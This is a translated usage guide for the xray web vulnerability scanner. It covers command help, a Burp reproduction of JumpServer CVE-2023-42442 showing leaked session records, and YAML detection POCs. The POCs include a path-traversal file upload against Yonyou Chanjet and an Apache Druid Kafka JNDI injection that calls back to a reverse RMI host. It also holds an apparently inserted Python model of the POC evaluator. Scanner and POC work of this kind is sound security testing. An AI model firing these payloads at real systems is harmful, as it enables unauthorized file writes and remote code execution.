xray download

Community edition: download and usage

Note: download the latest version; older versions may fail to load custom POCs.

https://github.com/chaitin/xray/releases

Usage

View the general help

xray_windows_amd64.exe --help

Version: 1.9.11/eb0c331d/COMMUNITY

NAME:
xray - A powerful scanner engine [https://docs.xray.cool]

USAGE:
[global options] command [command options] [arguments...]

COMMANDS:
webscan, ws Run a webscan task
servicescan, ss Run a service scan task
subdomain, sd Run a subdomain task
poclint, pl, lint lint yaml poc
burp-gamma, btg Convert the export file of burp historical proxy records to POC format
transform transform other script to gamma
reverse Run a standalone reverse server
convert convert results from json to html or from html to json
genca GenerateToFile CA certificate and key
upgrade check new version and upgrade self if any updates found
version Show version info
x A command that enables all plugins.
You can customize new commands or modify the plugins enabled by a command in the configuration file.
help, h Shows a list of commands or help for one command

GLOBAL OPTIONS:
--config FILE Load configuration from FILE (default: "config.yaml")
--log-level value Log level, choices are debug, info, warn, error, fatal
--help, -h show help
[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml

View the webscan usage

xray_windows_amd64.exe webscan --help

Version: 1.9.11/eb0c331d/COMMUNITY

NAME:
webscan - Run a webscan task

USAGE:
webscan [command options] [arguments...]

OPTIONS:
--list, -l list plugins
--plugins value, --plugin value, --plug value specify the plugins to run, separated by ','
--poc value, -p value specify the poc to run, separated by ','
--level value specify the level of poc to run, separated by ','
--tags value specify the level of poc to run, separated by ','

--listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
--basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests
--browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests
--url-file value, --uf value read urls from a local file and scan these urls, one url per line
--burp-file value, --bf value read requests from burpsuite exported file as targets
--url value, -u value scan a **single** url
--data value, -d value data string to be sent through POST (e.g. 'username=admin')
--raw-request FILE, --rr FILE load http raw request from a FILE
--force-ssl, --fs force usage of SSL/HTTPS for raw-request

--json-output FILE, --jo FILE output xray results to FILE in json format
--html-output FILE, --ho FILE output xray result to FILE in HTML format
--webhook-output value, --wo value post xray result to url in json format

Reproducing CVE-2023-42442

References: https://blog.csdn.net/holyxp/article/details/133066481

https://www.secrss.com/articles/58981

Send the request with Burp:

GET /api/v1/terminal/sessions/?limit=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

View the response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Sep 2023 08:05:28 GMT
Content-Type: application/json
Content-Length: 1782
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
X-Frame-Options: DENY
Content-Language: en
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: SESSION_COOKIE_NAME_PREFIX=jms_; Path=/

{"count":18168,"next":"http://example.com/api/v1/terminal/sessions/?limit=2&offset=2","previous":null,"results":[{"id":"4d2f4dfc-8332-46e1-a691-fe5dbe72fc63","user":"林(lin@example.com)","asset":"林(10.15.168.113)","user_id":"70932e0f-5e36-4086-821a-ee453d01f39f","asset_id":"bac40e7c-27d9-4040-b4ad-b692576ac0c9","account":"@INPUT(ltc)","account_id":"4172edfc-4c65-43af-844d-ad729c98babd","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.4.215","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:04:36 +0800","date_end":null},{"id":"95f80041-4bda-45e5-a513-f4bc55385587","user":"郭(guo@example.com)","asset":"郭(10.18.100.100)","user_id":"74b08df7-cadc-4e9b-a1b7-1dd6a53f0314","asset_id":"6dd5488f-bd7a-4731-817f-85217416a52c","account":"@INPUT(GW)","account_id":"98ab7554-e018-4f3d-b936-c1c9a37b62ab","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.129.206","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:03:41 +0800","date_end":null}]}

Custom POC demonstration

Usage: to run a single custom POC, the command is as follows:

xray_windows_amd64.exe webscan --plugins phantasm --poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml --url http://example.com/ --html-output CVE-2023-42442.html --json-output CVE-2023-42442.json

This is a JumpServer unauthorized access vulnerability (CVE-2023-42442). The POC is shown below.

The principle is simple: the rule describes the conditions checked against the server's response. It requires the status code to be 200 and the response body to contain the specific strings "count", "next", "previous" and "results". Together these conditions decide whether the check succeeded.

name: poc-yaml-jumpserver-session-replay-unauth
transport: http
rules:
  r0:
    request:
      method: GET
      path: /api/v1/terminal/sessions/?limit=1
      follow_redirects: false
    expression: >-
      response.status == 200 &&
      response.body_string.contains('"count":') &&
      response.body_string.contains('"next":') &&
      response.body_string.contains('"previous":') &&
      response.body_string.contains('"results":')
expression: r0()
detail:
  author: Chaitin
  links:
    - https://stack.chaitin.com/techblog/detail/156

Execution output:

____  ___.________.    ____.   _____.___.
\ \/ /\_ __ \ / _ \ \__ | |
\ / | _ _/ / /_\ \ / | |
/ \ | | \/ | \ \____ |
\___/\ \ |____| /\____|_ / / _____/
\_/ \_/ \_/ \/

Version: 1.9.11/eb0c331d/COMMUNITY

[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml

Enabled plugins: [phantasm]

[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/
[Vuln: phantasm]
Target "http://example.com/"
VulnType "poc-yaml-jumpserver-session-replay-unauth/default"
Author "Chaitin"
Links ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done

Finally, open the HTML report to view the vulnerability details.

POC writing guide

How to write a high-quality POC: https://docs.xray.cool/#/guide/hiq/summary

Rule lab: https://poc.xray.cool/

This tool lets you generate POCs conveniently, and it can also check a POC's format and detect duplicates.

For details, see the developer documentation: https://docs.xray.cool/#/guide/README

Community-contributed POCs: https://github.com/chaitin/xray/tree/master/pocs

POC examples:

name: poc-yaml-yonyou-chanjet-file-updoad
manual: true
transport: http
set:
  randstr: randomLowercase(60)
  rboundary: randomLowercase(8)
  randname: randomLowercase(6)
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"File1\"; filename=\"../../../img/login/{{randname}}.jpg\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{randstr}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\
        "
    expression: response.status == 200
  r1:
    request:
      cache: true
      method: GET
      path: /tplus/img/login/{{randname}}.jpg
    expression: response.status == 200 && response.body.bcontains(bytes(randstr))
expression: r0() && r1()
detail:
  author: Jarcis-cy
  links:
    - https://weibo.com/ttarticle/x/m/show/id/2309404807909669208397?_wb_client_=1
  vulnerability:
    id: CT-475791
    level: critical
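To show concretely how rules like these are evaluated (the JumpServer expression from the CVE-2023-42442 POC above, and the set:/{{var}} templating, bytes()/bcontains() check and r0() && r1() combination of the file-upload example), here is an added Python model of an xray-style POC evaluator. It is not xray's code and not from the community POC repository: it covers only the expression subset these POCs use, translates it to Python, and evaluates it against responses it is handed, so it runs offline. The JumpServer rule is copied from this page; the two-rule marker round-trip POC, the /notes/ paths, the FakeNoteServer stand-in and the two sample response bodies are constructed for the demo.

```python
import random
import re
import string

class BodyString(str):          # str with the CEL-style .contains() used in rules
    def contains(self, needle):
        return needle in self

class Body(bytes):              # bytes with .bcontains(), byte-level containment
    def bcontains(self, needle):
        return needle in self

class Response:                 # only the fields the POCs on this page touch
    def __init__(self, status, body):
        self.status = status
        self.body = Body(body)
        self.body_string = BodyString(body.decode("utf-8", "replace"))

# Functions callable from set:/expression: text; bytes(x) mirrors the CEL cast.
BUILTINS = {
    "randomLowercase": lambda n: "".join(random.choices(string.ascii_lowercase, k=n)),
    "bytes": lambda s: s.encode(),
}
TEMPLATE = re.compile(r"\{\{(\w+)\}\}")

def cel_eval(expr, namespace):
    # Translate && / || to Python and evaluate; rule text is operator-authored, never untrusted.
    py = expr.replace("&&", " and ").replace("||", " or ")
    return eval(py, {"__builtins__": {}}, namespace)

def render(value, variables):
    # Substitute {{var}} in strings, recursing into header dicts.
    if isinstance(value, str):
        return TEMPLATE.sub(lambda m: str(variables[m.group(1)]), value)
    if isinstance(value, dict):
        return {k: render(v, variables) for k, v in value.items()}
    return value

def evaluate_poc(poc, send):
    """Run one POC; `send(request) -> Response` is injected so this works offline. Each
    rule is sent once and cached; the top-level expression short-circuits like r0() && r1()."""
    variables = {}
    for name, expr in poc.get("set", {}).items():       # set: entries run in order
        variables[name] = cel_eval(expr, {**BUILTINS, **variables})
    verdicts = {}
    def make_rule(name, rule):
        def run():
            if name not in verdicts:
                response = send(render(rule["request"], variables))
                ns = {**BUILTINS, **variables, "response": response}
                verdicts[name] = bool(cel_eval(rule["expression"], ns))
            return verdicts[name]
        return run
    rules = {name: make_rule(name, rule) for name, rule in poc["rules"].items()}
    return bool(cel_eval(poc["expression"], rules))

# The JumpServer rule from this page (rules/expression keys), mirroring its YAML.
JUMPSERVER_POC = {
    "rules": {"r0": {
        "request": {"method": "GET", "path": "/api/v1/terminal/sessions/?limit=1"},
        "expression": "response.status == 200 && response.body_string.contains('\"count\":') && "
                      "response.body_string.contains('\"next\":') && response.body_string.contains('\"previous\":') && "
                      "response.body_string.contains('\"results\":')",
    }},
    "expression": "r0()",
}

# Constructed responses: the unauthenticated listing shape from the page, and a server demanding a session.
UNAUTH_BODY = b'{"count":18168,"next":"http://example.com/api/v1/terminal/sessions/?limit=2&offset=2","previous":null,"results":[]}'
DENIED_BODY = b'{"detail":"Authentication credentials were not provided."}'

def check_jumpserver(status, body):
    return evaluate_poc(JUMPSERVER_POC, lambda request: Response(status, body))

# Constructed two-rule POC shaped like the page's second example: r0 writes a random marker, r1 reads it back.
ROUNDTRIP_POC = {
    "set": {"randstr": "randomLowercase(60)", "randname": "randomLowercase(6)"},
    "rules": {
        "r0": {"request": {"method": "PUT", "path": "/notes/{{randname}}", "body": "{{randstr}}"},
               "expression": "response.status == 200"},
        "r1": {"request": {"method": "GET", "path": "/notes/{{randname}}"},
               "expression": "response.status == 200 && response.body.bcontains(bytes(randstr))"},
    },
    "expression": "r0() && r1()",
}

class FakeNoteServer:           # in-memory stand-in for a target; `writable` gates PUT
    def __init__(self, writable=True):
        self.writable, self.store = writable, {}
    def send(self, request):
        if request["method"] == "PUT" and self.writable:
            self.store[request["path"]] = request["body"].encode()
            return Response(200, b"ok")
        body = self.store.get(request["path"]) if request["method"] == "GET" else None
        return Response(200, body) if body is not None else Response(403, b"denied")

def check_roundtrip(writable):
    return evaluate_poc(ROUNDTRIP_POC, FakeNoteServer(writable).send)
```

check_jumpserver returns True for the unauthenticated listing body and False once the server answers with a 401 (or with a 200 whose body lacks the four keys), which is exactly the distinction the page's expression encodes. The round-trip POC returns True only when the stand-in accepts the write; because r0() && r1() short-circuits, r1 is never sent when r0 fails, and the verdict cache means a rule referenced twice in the top-level expression is still requested only once.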
name: poc-yaml-apache-druid-kafka-rce
transport: http
set:
  reverse: newReverse()
  reverseRMI: reverse.rmi
rules:
  r0:
    request:
      method: POST
      path: /druid/indexer/v1/sampler?for=connect
      follow_redirects: false
      headers:
        Content-Type: application/json
      body: |-
        {
          "type":"kafka",
          "spec":{
            "type":"kafka",
            "ioConfig":{
              "type":"kafka",
              "consumerProperties":{
                "bootstrap.servers":"6.6.6.6:9092",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"{{reverseRMI}}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
              },
              "topic":"any",
              "useEarliestOffset":true,
              "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                  "raw"
                ]
              }
            },
            "dataSchema":{
              "dataSource":"sample",
              "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
              },
              "dimensionsSpec":{

              },
              "granularitySpec":{
                "rollup":false
              }
            },
            "tuningConfig":{
              "type":"kafka"
            }
          },
          "samplerConfig":{
            "numRows":500,
            "timeoutMs":15000
          }
        }
    expression: reverse.wait(5)
expression: r0()
detail:
  author: chaitin